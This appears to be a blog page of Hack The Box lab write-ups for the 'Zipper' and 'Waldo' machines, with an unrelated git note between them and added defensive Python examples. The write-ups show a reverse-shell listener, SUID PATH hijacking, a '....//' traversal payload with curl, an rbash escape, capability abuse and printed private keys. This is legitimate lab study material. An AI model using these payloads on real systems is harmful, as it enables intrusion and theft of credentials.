Type help or \? to list commands.

[zabbix-cli zapper@zabbix-ID]$

First, enable GUI access by adding zapper to the “Zabbix administrators” group (ID 7) and removing it from “No access to the frontend”.

[zabbix-cli zapper@zabbix-ID]$  show_usergroups
+---------+---------------------------+--------------------+-------------+--------+
| GroupID | Name                      |     GUI access     |    Status   | Users  |
+---------+---------------------------+--------------------+-------------+--------+
|       9 | Disabled                  | System default (0) | Disable (1) |        |
|      11 | Enabled debug mode        | System default (0) |  Enable (0) | me     |
|       8 | Guests                    | System default (0) |  Enable (0) | guest  |
|      12 | No access to the frontend |    Disable (2)     |  Enable (0) | zapper |
|       7 | Zabbix administrators     | System default (0) |  Enable (0) | Admin  |
+---------+---------------------------+--------------------+-------------+--------+

[zabbix-cli zapper@zabbix-ID]$ add_user_to_usergroup zapper 7

[Done]: Users zapper added to these usergroups: 7

[zabbix-cli zapper@zabbix-ID]$ remove_user_from_usergroup zapper "No access to the frontend"

[Done]: User zapper removed from this usergroup: No access to the frontend

Next, log in to the web console and go to Configuration->Actions.

Create a new action that executes a reverse shell.
Screenshots: Action window, Conditions window, Operations window.

Next, we have to create a new trigger for the action.
Go to Configuration->Hosts->Zipper (hostname)->Triggers->Create trigger.

We have to wait a while for the reverse shell to connect back.

root@kali:~# nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.108] 56834
/bin/sh: 0: can't access tty; job control turned off

# Getting tty
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
zabbix@zipper:~$

With some enumeration, we find an interesting file in /home/zapper/utils.

$ cat backup.sh 
#!/bin/bash
#
# Quick script to backup all utilities in this folder to /backups
#
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
echo $?

As we can see, the script contains a password, “ZippityDoDah”.
We can use it to switch to the user zapper.

zabbix@zipper:/home/zapper$ su zapper
su zapper
Password: ZippityDoDah


              Welcome to:
███████╗██╗██████╗ ██████╗ ███████╗██████╗ 
╚══███╔╝██║██╔══██╗██╔══██╗██╔════╝██╔══██╗
  ███╔╝ ██║██████╔╝██████╔╝█████╗  ██████╔╝
 ███╔╝  ██║██╔═══╝ ██╔═══╝ ██╔══╝  ██╔══██╗
███████╗██║██║     ██║     ███████╗██║  ██║
╚══════╝╚═╝╚═╝     ╚═╝     ╚══════╝╚═╝  ╚═╝

[0] Packages Need To Be Updated
[>] Backups:
4.0K	/backups/zapper_backup-2018-10-26.7z
4.0K	/backups/zabbix_scripts_backup-2018-10-26.7z

zapper@zipper:~$

user.txt is in zapper's home directory.

zapper@zipper:~$ cat user.txt 
aa29e93f48c64f8586448b6f6e38fe33

In ~/.ssh there is an SSH private key file.
From now on we can use it to get a shell directly.

zapper@zipper:~$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAzU9krR2wCgTrEOJY+dqbPKlfgTDDlAeJo65Qfn+39Ep0zLpR
l3C9cWG9WwbBlBInQM9beD3HlwLvhm9kL5s55PIt/fZnyHjYYkmpVKBnAUnPYh67
GtTbPQUmU3Lukt5KV3nf18iZvQe0v/YKRA6Fx8+Gcs/dgYBmnV13DV8uSTqDA3T+
eBy7hzXoxW1sInXFgKizCEXbe83vPIUa12o0F5aZnfqM53MEMcQxliTiG2F5Gx9M
2dgERDs5ogKGBv4PkgMYDPzXRoHnktSaGVsdhYNSxjNbqE/PZFOYBq7wYIlv/QPi
eBTz7Qh0NNR1JCAvM9MuqGURGJJzwdaO4IJJWQIDAQABAoIBAQDIu7MnPzt60Ewz
+docj4vvx3nFCjRuauA71JaG18C3bIS+FfzoICZY0MMeWICzkPwn9ZTs/xpBn3Eo
84f0s8PrAI3PHDdkXiLSFksknp+XNt84g+tT1IF2K67JMDnqBsSQumwMwejuVLZ4
aMqot7o9Hb3KS0m68BtkCJn5zPGoTXizTuhA8Mm35TovXC+djYwgDsCPD9fHsajh
UKmIIhpmmCbHHKmMtSy+P9jk1RYbpJTBIi34GyLruXHhl8EehJuBpATZH34KBIKa
8QBB1nGO+J4lJKeZuW3vOI7+nK3RqRrdo+jCZ6B3mF9a037jacHxHZasaK3eYmgP
rTkd2quxAoGBAOat8gnWc8RPVHsrx5uO1bgVukwA4UOgRXAyDnzOrDCkcZ96aReV
UIq7XkWbjgt7VjJIIbaPeS6wmRRj2lSMBwf1DqZIHDyFlDbrGqZkcRv76/q15Tt0
oTn4x8SRZ8wdTeSeNRE3c5aFgz+r6cklNwKzMNuiUzcOoR8NSVOJPqJzAoGBAOPY
ks9+AJAjUTUCUF5KF4UTwl9NhBzGCHAiegagc5iAgqcCM7oZAfKBS3oD9lAwnRX+
zH84g+XuCVxJCJaE7iLeJLJ4vg6P43Wv+WJEnuGylvzquPzoAflYyl3rx0qwCSNe
8MyoGxzgSRrTFtYodXtXY5FTY3UrnRXLr+Q3TZYDAoGBALU/NO5/3mP/RMymYGac
OtYx1DfFdTkyY3y9B98OcAKkIlaA0rPh8O+gOnkMuPXSia5mOH79ieSigxSfRDur
7hZVeJY0EGOJPSRNY5obTzgCn65UXvFxOQCYtTWAXgLlf39Cw0VswVgiPTa4967A
m9F2Q8w+ZY3b48LHKLcHHfx7AoGATOqTxRAYSJBjna2GTA5fGkGtYFbevofr2U8K
Oqp324emk5Keu7gtfBxBypMD19ZRcVdu2ZPOkxRkfI77IzUE3yh24vj30BqrAtPB
MHdR24daiU8D2/zGjdJ3nnU19fSvYQ1v5ObrIDhm9XNFRk6qOlUp+6lW7fsnMHBu
lHBG9NkCgYEAhqEr2L1YpAW3ol8uz1tEgPdhAjsN4rY2xPAuSXGXXIRS6PCY8zDk
WaPGjnJjg9NfK2zYJqI2FN+8Yyfe62G87XcY7ph8kpe0d6HdVcMFE4IJ8iKCemNE
Yh/DOMIBUavqTcX/RVve0rEkS8pErQqYgHLHqcsRUGJlJ6FSyUPwjnQ=
-----END RSA PRIVATE KEY-----

3. Getting root

Getting root is simpler.
In the utils directory under ~/ there is an executable with the SUID bit set.

zapper@zipper:~/utils$ ls -la
total 24
drwxrwxr-x 2 zapper zapper 4096 Feb 21 04:20 .
drwxr-xr-x 6 zapper zapper 4096 Sep  9 19:12 ..
-rwxr-xr-x 1 zapper zapper  194 Sep  8 13:12 backup.sh
-rwxrwxr-x 1 zapper zapper   62 Feb 21 04:20 systemctl
-rwsr-sr-x 1 root   root   7556 Sep  8 13:05 zabbix-service

Inspecting that file, we can see that it apparently calls the "systemctl" command by name.

placeholder

We can take advantage of this possible command-hijacking weakness.
We can create a script named "systemctl" in the same directory, and zabbix-service will execute it in place of the real one.
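The underlying defect is a privileged program that looks up a command through PATH instead of calling it by absolute path with a fixed environment. The following is an added example, not part of the writeup: an audit function that walks a PATH value and reports every entry an unprivileged user could plant a binary in (the current directory, relative entries, missing directories, and directories that are not root-owned or are group- or world-writable). It runs offline against a constructed filesystem view (`FAKE_FS`, with made-up owners and modes); `real_lookup` does the same with `os.stat` on a live host.

```python
import os
import stat
from collections import namedtuple

DirInfo = namedtuple("DirInfo", "exists uid gid mode")

# Constructed view of a filesystem so the audit can run offline; owners and
# modes are made up for the demonstration.
FAKE_FS = {
    "/usr/local/sbin": DirInfo(True, 0, 0, 0o755),
    "/usr/sbin": DirInfo(True, 0, 0, 0o755),
    "/usr/bin": DirInfo(True, 0, 0, 0o755),
    "/bin": DirInfo(True, 0, 0, 0o755),
    "/home/zapper/utils": DirInfo(True, 1000, 1000, 0o775),
    "/tmp": DirInfo(True, 0, 0, 0o1777),
    "/opt/tools": DirInfo(True, 0, 0, 0o777),
    "/opt/shared": DirInfo(True, 0, 50, 0o775),
}


def fake_lookup(path):
    return FAKE_FS.get(path, DirInfo(False, 0, 0, 0))


def real_lookup(path):
    """Same information taken from the live filesystem."""
    try:
        st = os.stat(path)
    except OSError:
        return DirInfo(False, 0, 0, 0)
    return DirInfo(True, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


def audit_path(path_value, lookup=real_lookup):
    """Return (entry, reason) for each PATH entry that an unprivileged user
    could use to shadow a command looked up by a privileged program."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "searches the caller's current directory"))
            continue
        if not entry.startswith("/"):
            findings.append((entry, "relative entry, resolved against the caller's cwd"))
            continue
        info = lookup(entry)
        if not info.exists:
            findings.append((entry, "does not exist; whoever can create it controls lookups"))
        elif info.uid != 0:
            findings.append((entry, "owned by uid %d, not root" % info.uid))
        elif info.mode & stat.S_IWOTH:
            sticky = (" (sticky bit: others can still add new names)"
                      if info.mode & stat.S_ISVTX else "")
            findings.append((entry, "world-writable" + sticky))
        elif info.mode & stat.S_IWGRP and info.gid != 0:
            findings.append((entry, "writable by gid %d" % info.gid))
    return findings


if __name__ == "__main__":
    # Audit the environment this script was started with.
    for entry, reason in audit_path(os.environ.get("PATH", "")):
        print("%-25s %s" % (entry, reason))
```

The corresponding fix in the privileged helper is to invoke `/bin/systemctl` by its full path and to reset PATH to a fixed root-owned list before any `system()` or `exec*p()` call, so the caller's environment plays no part in which binary runs.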

zapper@zipper:~/utils$ echo "cat /root/root.txt" > systemctl
zapper@zipper:~/utils$ chmod 777 systemctl 
zapper@zipper:~/utils$ ls -la
total 24
drwxrwxr-x 2 zapper zapper 4096 Oct 26 08:48 .
drwxr-xr-x 6 zapper zapper 4096 Oct 26 08:35 ..
-rwxr-xr-x 1 zapper zapper  194 Sep  8 13:12 backup.sh
-rwxrwxrwx 1 zapper zapper   19 Oct 26 08:48 systemctl
-rwsr-sr-x 1 root   root   7556 Sep  8 13:05 zabbix-service
zapper@zipper:~/utils$ ./zabbix-service 
start or stop?: start
a7c743d35b8efbedfd9336492a8eab6e
a7c743d35b8efbedfd9336492a8eab6e

Changing All Authors and Committers

Environment

  • OS: Kali linux 2018.4
  • Git: 2.20.1

Explanation

Changing all authors and committers of git history.

Solution

root@kali:~# git filter-branch -f --env-filter "GIT_AUTHOR_NAME='1n4r1'; GIT_AUTHOR_EMAIL='1n4r1@protonmail.com'; GIT_COMMITTER_NAME='1n4r1'; GIT_COMMITTER_EMAIL='1n4r1@protonmail.com';" HEAD

This rewrites history, so the local repository diverges from the remote.
After this command, we have to use git push --force.

root@kali:~/1n4r1.github.io# git push origin master
Username for 'https://github.com': 1n4r1
Password for 'https://1n4r1@github.com': 
To https://github.com/1n4r1/1n4r1.github.io.git
 ! [rejected]        master -> master (non-fast-forward)
error: failed to push some refs to 'https://github.com/1n4r1/1n4r1.github.io.git'
hint: Updates were rejected because the tip of your current branch is behind
hint: its remote counterpart. Integrate the remote changes (e.g.
hint: 'git pull ...') before pushing again.
hint: See the 'Note about fast-forwards' in 'git push --help' for details.


root@kali:~/1n4r1.github.io# git push -- force origin master
fatal: 'force' does not appear to be a git repository
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

Hackthebox Waldo Writeup


Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN. This is a write-up of the machine "Waldo" on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.87 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-14 08:55 EEST
Nmap scan report for 10.10.10.87
Host is up (0.046s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
|   256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
|_  256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
80/tcp   open     http           nginx 1.12.2
|_http-server-header: nginx/1.12.2
| http-title: List Manager
|_Requested resource was /list.html
|_http-trane-info: Problem with XML parsing of /evox/about
8888/tcp filtered sun-answerbook

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.79 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.87/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.87/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/09/14 08:58:10 Starting gobuster
=====================================================
2018/09/14 08:58:10 [-] Wildcard response found: http://10.10.10.87/e113ab7b-ef12-44fe-b1c0-effad3af0c0b => 302
2018/09/14 08:58:10 [!] To force processing of Wildcard responses, specify the '-fw' switch.
=====================================================
2018/09/14 08:58:10 Finished
=====================================================

2. Getting User

It looks like an interesting web page is running on the server.

placeholder

Inspecting it with the Chrome developer tools, we can see that it is a static HTML page driven by "list.js".

placeholder

In that file, some functions reference interesting PHP endpoints.

root@kali:~# curl -i http://10.10.10.87/list.js

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 21:34:34 GMT
Content-Type: application/javascript
Content-Length: 6245
Last-Modified: Thu, 03 May 2018 20:48:36 GMT
Connection: keep-alive
ETag: "5aeb75a4-1865"
Expires: Sun, 23 Sep 2018 21:34:34 GMT
Cache-Control: max-age=432000
Accept-Ranges: bytes

~~~

function readDir(path){ 
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST","dirRead.php",false);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send('path=' + path);
	if (xhttp.readyState === 4 && xhttp.status === 200) {
		return xhttp.responseText;
	}else{
	}
}


function readFile(file){ 
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST","fileRead.php",false);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send('file=' + file);
	if (xhttp.readyState === 4 && xhttp.status === 200) {
		return xhttp.responseText;
	}else{
	}
}

~~~

For instance, dirRead.php appears to be vulnerable to directory traversal.
This means we can list any directory on Waldo that the web server user has permission to read.

root@kali:~# curl -i -X POST http://10.10.10.87/dirRead.php -H "Content-Type: application/x-www-form-urlencoded" -d "path=./" 
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 21:55:09 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.16

[".","..",".list","background.jpg","cursor.png","dirRead.php","face.png","fileDelete.php","fileRead.php","fileWrite.php","index.php","list.html","list.js"]

In addition, by taking advantage of fileRead.php, we can retrieve an SSH private key for user nobody.

root@kali:~# curl -i -X POST http://10.10.10.87/fileRead.php -H "Content-Type: application/x-www-form-urlencoded" -d "file=....//....//....//home/nobody/.ssh/.monitor"
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 18 Sep 2018 23:20:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.16

{"file":"-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl\nmR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f\n87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS\ndGCc\/gNpW\/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN\no8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8\/6pceowqs9ujRkNzH9T1lJq4Fx1V\nvi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl\/wdmuPEW6kU\nvmzhRU3gcjuzwBET0TNejbL\/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR\/6\npKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5\n8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q\n1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox\/05qoOBL4kQxUM7\nVxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS\ndVa3yLECgYEA7jk51MvUGSIFF6GkXsNb\/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO\nv0og0X\/iROXAcp6Z9WGpIc6FhVgJd\/4bNlTR+A\/lWQwFt1b6l03xdsyaIyIWi9xr\nxsb2sLNWP56A\/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY\nqFfdAWrvVZjp26Yf\/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI\nyzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1\n\/pAcw\/+\/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw\/IMnLa3drm3CIAa32iU\nLRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ\/\nlnN2n1WyTIyEuGA\/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp\nw7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9\n1HLmBkDTjjj\/xAJAZuiOF4Rs\/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT\nrj1BhUCzZCUgQABtpC6vYj\/HLLlzpiC05AIEhDdvToPK\/0WuY64fds0VccAYmMDr\nX\/PlAoGAS6UhbCm5TWZhtL\/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2\nDvVny8gKbM\/OenwHnTlwRTEj5qdeAM40oj\/mwCDc6kpV1lJXrW2R5mCH9zgbNFla\nW0iKCBU

We can use it with "ssh -i".

root@kali:~# ssh nobody@10.10.10.87 -i private_key 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.

waldo:~$ cat user.txt
32768bcd7513275e085fd4e7b63e9d24
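The `....//` payload used against fileRead.php above only works because the server strips `../` from the input once: removing the inner `../` from `....//` leaves a fresh `../` behind. The following is an added example, not part of the writeup and not Waldo's PHP code: a Python reimplementation of that flawed filter next to a containment check that does no stripping at all and instead resolves the path and requires the result to stay inside the web root. `WEB_ROOT` is an assumed directory for the demonstration.

```python
import os

# Assumed web root for the demonstration; fileRead.php's real base directory
# is not known from the writeup.
WEB_ROOT = "/var/www/html"


def naive_sanitize(user_path):
    """Flawed filter: removes '../' once (non-recursively). A '....//' segment
    turns into '../' after the removal, which is exactly the bypass shown above."""
    return user_path.replace("../", "")


def resolve_under_root(user_path, root=WEB_ROOT):
    """Resolve user_path relative to root and refuse anything that lands outside it.

    realpath follows symlinks, so a link inside root that points outward is
    caught too; an absolute user_path discards root in os.path.join and is
    rejected for the same reason."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise ValueError("path escapes web root: %r" % user_path)
    return candidate


def is_within_root(user_path, root=WEB_ROOT):
    """Boolean convenience wrapper around resolve_under_root."""
    try:
        resolve_under_root(user_path, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "....//....//....//home/nobody/.ssh/.monitor"
    print("after naive strip:", naive_sanitize(payload))
    print("naive result allowed?", is_within_root(naive_sanitize(payload)))
    print("raw payload allowed?", is_within_root(payload))
```

Note the last line of the demonstration: with no stripping, `....` is just an odd directory name and the raw payload resolves harmlessly inside the root, so the containment check is both simpler and safer than any attempt to clean the string.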

3. Getting root

We can find an interesting private key file in /home/monitor/.ssh

waldo:~/.ssh$ cat .monitor 
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----

With the following command, we can get out of the Docker container as user "monitor".

waldo:~/.ssh$ ssh monitor@localhost -i .monitor
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1

~~~

-rbash: alias: command not found
monitor@waldo:~$ 

Out of the box we cannot even run "cd".
To bypass the restricted shell, we can take advantage of the red command.

monitor@waldo:~$ cd ../
-rbash: cd: restricted
monitor@waldo:~$ red
!'/bin/sh'
$ cd /
$ ls
bin   etc	  initrd.img.old  lost+found  opt   run   sys  var
boot  home	  lib		  media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64		  mnt	      root  srv   usr  vmlinuz.old
$ 

Then we can find files that carry an over-permissive file capability.

$ /sbin/getcap -r / 2>/dev/null        
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei
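Reading `getcap -r` output by eye is error-prone, and the flag letters matter: `+ep` hands the capability to any caller on exec, while `+ei` (as on both files above) only grants it to a caller whose own inheritable set already contains it, which is what a pam_cap entry for a particular user provides. The following is an added example, not part of the writeup: a parser for both the older `path = caps` and the newer `path caps` getcap output formats, with a classifier that marks file-access and root-equivalent capabilities as high (unconditional) or conditional (inheritable-only). The sample embeds the two lines above plus two constructed entries; the list of dangerous capabilities is the author's own selection.

```python
import re

# Constructed sample: the two lines getcap printed on Waldo plus two made-up
# entries, the last one in the newer libcap output format.
SAMPLE_GETCAP = """\
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei
/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/backupd cap_dac_read_search,cap_chown=eip
"""

# Capabilities that let a process read or alter files it does not own, or
# otherwise reach root-equivalent power (author's selection, not exhaustive).
DANGEROUS = {
    "cap_dac_read_search", "cap_dac_override", "cap_chown", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_sys_rawio",
}

# One clause: comma-separated capability names, an operator, then flag letters.
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")


def split_line(line):
    """Separate the path from the capability clauses in either output format."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok == "=" or CLAUSE.match(tok):
            return " ".join(tokens[:i]), [t for t in tokens[i:] if t != "="]
    return None, []


def parse_getcap(text):
    """Return (path, capability, flags) for every capability granted in getcap output."""
    rows = []
    for line in text.splitlines():
        path, clauses = split_line(line)
        if not path:
            continue
        for clause in clauses:
            m = CLAUSE.match(clause)
            if not m or m.group(2) == "-":
                continue  # a '-' clause removes flags, it grants nothing
            names, _, flags = m.groups()
            for cap in names.split(","):
                rows.append((path, cap, set(flags)))
    return rows


def audit_getcap(text):
    """Classify each file capability by how it is obtained at exec time."""
    findings = []
    for path, cap, flags in parse_getcap(text):
        if cap not in DANGEROUS:
            severity = "info"
        elif "p" in flags:
            severity = "high"          # granted to every caller on exec
        else:
            severity = "conditional"   # only if the caller's inheritable set has it
        findings.append({"path": path, "cap": cap,
                         "flags": "".join(sorted(flags)), "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print("%(severity)-11s %(cap)-22s +%(flags)-3s %(path)s" % f)
```

The "conditional" entries are the ones to cross-check against /etc/security/capability.conf: a cap_dac_read_search grant to a low-privilege login account, combined with a general-purpose file reader like tac, is equivalent to giving that account read access to every file on the system.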

tac has cap_dac_read_search, which bypasses file read permission checks.
Finally, all we have to do is invoke tac by its full path on root.txt.

$ /usr/bin/tac /root/root.txt
8fb67c84418be6e45fbd348fd4584f6c